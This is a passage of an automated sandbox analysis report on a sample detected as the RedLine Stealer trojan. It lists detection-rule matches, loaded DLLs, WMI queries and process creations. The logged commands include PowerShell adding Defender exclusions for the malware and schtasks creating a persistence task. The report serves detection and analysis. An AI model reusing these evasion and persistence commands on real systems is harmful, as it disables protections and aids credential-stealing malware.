                    Source: 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: PZNfhfaj9O.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: CiENBY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, C5c8K7mA0nZqCckpt9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, C5c8K7mA0nZqCckpt9.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/99@2/1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | File created: C:\Users\user\AppData\Roaming\CiENBY.exe
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3328:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | Mutant created: \Sessions\1\BaseNamedObjects\EscmGzfpPEulDcYOXWoJYSO
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3010.tmp
                    Source: PZNfhfaj9O.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003459000.00000004.00000800.00020000.00000000.sdmp, tmp5CAB.tmp.9.dr, tmp6F9C.tmp.18.dr, tmp5C7B.tmp.9.dr, tmp6F79.tmp.18.dr, tmp6F9D.tmp.18.dr, tmp6F8B.tmp.18.dr, tmp6F8A.tmp.18.dr, tmp2665.tmp.9.dr, tmp5CBD.tmp.9.dr, tmp5C7A.tmp.9.dr, tmp6FAD.tmp.18.dr, tmp5CAC.tmp.9.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PZNfhfaj9O.exe | ReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | File read: C:\Users\user\Desktop\PZNfhfaj9O.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Users\user\Desktop\PZNfhfaj9O.exe "C:\Users\user\Desktop\PZNfhfaj9O.exe"
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\CiENBY.exe C:\Users\user\AppData\Roaming\CiENBY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp5461.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | Process created: C:\Users\user\AppData\Roaming\CiENBY.exe "C:\Users\user\AppData\Roaming\CiENBY.exe"
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeSection loaded: amsi.dll
